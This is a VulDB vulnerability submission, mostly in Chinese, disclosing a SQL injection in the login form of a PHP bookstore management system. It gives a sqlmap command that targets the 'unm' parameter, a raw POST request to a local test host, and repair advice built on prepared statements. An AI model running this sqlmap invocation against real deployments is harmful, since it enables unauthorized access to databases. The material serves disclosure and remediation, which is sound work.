提交 #567696: 1000 Projects Bookstore Management System PHP MySQL Project v1.0 SQL Injection信息

标题1000 Projects Bookstore Management System PHP MySQL Project v1.0 SQL Injection
描述## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash 《sqlmap.py -r sqli.txt -p unm --batch --dbs》 ``` <img width="803" alt="Image" src="https://github.com/hhhanxx/attack/blob/main/Snipaste_2025-04-30_19-06-41.png?raw=true" /> ``` POST /login_process.php HTTP/1.1 Host: 192.168.137.1:85 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 15 Origin: http://192.168.137.1:85 Connection: close Referer: http://192.168.137.1:85/login.php Cookie: PHPSESSID=e47glfg37rcfj9nsjbv99op8v5 Upgrade-Insecure-Requests: 1 Priority: u=0, i unm=123&pwd=123 ``` # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
来源⚠️ https://github.com/hhhanxx/attack/issues/4
用户
 attackxu (UID 84219)
提交2025-04-30 13時13分 (12 月前)
管理2025-05-16 09時00分 (16 days later)
状态重复
VulDB条目283418 [1000 Projects Bookstore Management System 1.0 Login /admin/login_process.php unm/pwd SQL注入]
积分0

上一步一览下一步

Do you want to use VulDB in your project?

Use the official API to access entries easily!